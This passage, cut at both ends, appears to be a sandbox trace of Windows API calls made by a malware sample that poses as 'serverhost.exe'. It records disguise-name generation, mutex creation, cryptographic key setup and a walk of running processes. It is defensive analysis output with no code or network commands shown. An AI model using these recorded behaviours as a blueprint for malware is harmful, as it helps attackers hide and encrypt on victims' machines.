flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.190] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.191] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.192] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.240] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0057.240] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0057.240] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0057.240] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b0000 [0057.241] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0057.241] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0057.241] FreeConsole () returned 0 [0057.241] VirtualProtect (in: lpAddress=0x2b1000, dwSize=0x885f, flNewProtect=0x20, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0057.241] VirtualProtect (in: lpAddress=0x2ba000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0057.241] VirtualProtect (in: lpAddress=0x2bb000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0057.241] VirtualProtect (in: lpAddress=0x2bc000, dwSize=0x4d8, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0057.241] VirtualProtect (in: lpAddress=0x2b0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0058.966] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc18, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0058.967] _snwprintf (in: _Dest=0x12fe20, _Count=0x40, _Format="E%X" | out: _Dest="EA991ED3B") returned 9 [0058.967] _snwprintf (in: _Dest=0x12fea0, _Count=0x40, _Format="M%X" | out: _Dest="MA991ED3B") returned 9 [0058.967] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EA991ED3B") returned 0xc0 [0058.967] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MA991ED3B") returned 0xc4 [0058.967] GetLastError () returned 0xb7 [0058.967] SetEvent (hEvent=0xc0) returned 1 [0058.974] CloseHandle (hObject=0xc0) returned 1 [0058.974] CloseHandle (hObject=0xc4) returned 1 [0058.974] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0058.974] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x77140000 [0058.974] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0058.974] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0058.975] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0058.975] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0058.980] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0058.980] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0058.982] GetWindowsDirectoryW (in: lpBuffer=0x12f9f8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0058.982] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x2bb27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2bb27c*=0x78b95e2e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0058.982] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bb9c8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0058.982] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x6) returned 0x0 [0058.988] lstrlenA (lpString="agent,app,audio,bio,bits,cache,card,cart,cert,com,crypt,dcom,defrag,device,dhcp,dns,event,evt,flt,gdi,group,help,home,host,info,iso,launch,log,logon,lookup,man,math,mgmt,msi,ncb,net,nv,nvidia,proc,prop,prov,provider,reg,rpc,screen,search,sec,server,service,shed,shedule,spec,srv,storage,svc,sys,system,task,time,video,view,win,window,wlan,wmi") returned 342 [0058.988] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2bb5b8 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0058.991] _snwprintf (in: _Dest=0x2bb5b8, _Count=0x104, _Format="%s\\Microsoft\\Windows" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows") returned 56 [0058.991] _snwprintf (in: _Dest=0x2bb7c0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0058.991] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x104 [0058.991] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0058.991] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3b0000 [0058.991] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19000 [0058.991] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x3b0000, Length=0x19000) returned 0x67ecad1c [0058.992] UnmapViewOfFile (lpBaseAddress=0x3b0000) returned 1 [0058.993] CloseHandle (hObject=0x100) returned 1 [0058.993] CloseHandle (hObject=0x104) returned 1 [0058.993] GetComputerNameW (in: lpBuffer=0x12f9c8, nSize=0x12f9ec | out: lpBuffer="F71GWAT", nSize=0x12f9ec) returned 1 [0058.993] _snprintf (in: _Dest=0x2bb2a8, _Count=0x104, _Format="%S_%08X" | out: _Dest="F71GWAT_78B95E2E") returned 16 [0058.993] _snwprintf (in: _Dest=0x12f968, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\I78B95E2E") returned 16 [0058.994] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\I78B95E2E") returned 0x104 [0058.994] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x0) returned 0x0 [0058.994] _snwprintf (in: _Dest=0x12f868, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\E78B95E2E") returned 16 [0058.994] _snwprintf (in: _Dest=0x12f8e8, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\M78B95E2E") returned 16 [0058.994] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\M78B95E2E") returned 0x100 [0058.994] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\E78B95E2E") returned 0x108 [0058.994] SignalObjectAndWait (hObjectToSignal=0x108, hObjectToWaitOn=0x100, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0058.994] ResetEvent (hEvent=0x108) returned 1 [0058.994] ReleaseMutex (hMutex=0x104) returned 1 [0058.994] CloseHandle (hObject=0x104) returned 1 [0058.994] GetTickCount () returned 0x166cd [0058.994] CreateTimerQueueTimer (in: phNewTimer=0x12f9e8, TimerQueue=0x0, Callback=0x2b8310, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x12f9e8*=0x6136c8) returned 1 [0058.994] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0072.243] DeleteTimerQueueTimer (TimerQueue=0x0, Timer=0x6136c8, CompletionEvent=0xffffffff) returned 1 [0072.243] CloseHandle (hObject=0x108) returned 1 [0072.243] CryptDestroyHash (hHash=0x613108) returned 0 [0072.243] CryptDestroyKey (hKey=0x615940) returned 1 [0072.243] CryptDestroyKey (hKey=0x615c20) returned 0 [0072.243] CryptReleaseContext (hProv=0x614f70, dwFlags=0x0) returned 1 [0072.243] ExitProcess (uExitCode=0x0) Thread: id = 36 os_tid = 0xb0c Thread: id = 37 os_tid = 0xb10 [0060.007] GetTickCount () returned 0x16ac3 [0064.140] GetTickCount () returned 0x17a5d Thread: id = 38 os_tid = 0xb14 [0061.004] GetTickCount () returned 0x16ea9 [0061.004] lstrcmpiW (lpString1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpString2="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 0 [0062.002] GetTickCount () returned 0x17290 [0062.002] CryptAcquireContextW (in: phProv=0x2bb284, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x2bb284*=0x614f70) returned 1 [0062.021] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x2b12b8, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x18bfd50, pcbStructInfo=0x18bfd54 | out: pvStructInfo=0x18bfd50, pcbStructInfo=0x18bfd54) returned 1 [0062.022] CryptImportKey (in: hProv=0x614f70, pbData=0x5ffdb0, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x2bb288 | out: phKey=0x2bb288*=0x613108) returned 1 [0062.022] LocalFree (hMem=0x5ffdb0) returned 0x0 [0062.022] CryptGenKey (in: hProv=0x614f70, Algid=0x660e, dwFlags=0x1, phKey=0x2bb28c | out: phKey=0x2bb28c*=0x615940) returned 1 [0062.022] CryptCreateHash (in: hProv=0x614f70, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x2bb290 | out: phHash=0x2bb290) returned 1 [0063.001] GetTickCount () returned 0x17676 [0063.001] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18bf90c, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0063.001] lstrlenW (lpString="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0063.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c [0063.004] Process32FirstW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.004] lstrcpyW (in: lpString1=0x616124, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0063.004] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0063.005] lstrcpyW (in: lpString1=0x61633c, lpString2="System" | out: lpString1="System") returned="System" [0063.005] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0063.006] lstrcpyW (in: lpString1=0x616554, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0063.006] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.006] lstrcpyW (in: lpString1=0x61676c, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0063.006] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0063.007] lstrcpyW (in: lpString1=0x616984, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0063.007] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.007] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0063.008] lstrcpyW (in: lpString1=0x616b9c, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0063.008] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0063.009] lstrcpyW (in: lpString1=0x616db4, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0063.009] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0063.010] lstrcpyW (in: lpString1=0x616fcc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0063.010] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0063.010] lstrcpyW (in: lpString1=0x6171e4, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0063.010] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.011] lstrcpyW (in: lpString1=0x6173fc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0063.011] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.011] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.012] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.013] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.013] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0063.014] lstrcpyW (in: lpString1=0x617614, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0063.014] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.015] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.015] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0063.016] lstrcpyW (in: lpString1=0x61782c, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0063.016] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.017] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0063.017] lstrcpyW (in: lpString1=0x617a44, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0063.017] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.018] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x328, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0063.018] lstrcpyW (in: lpString1=0x617c5c, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0063.018] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, 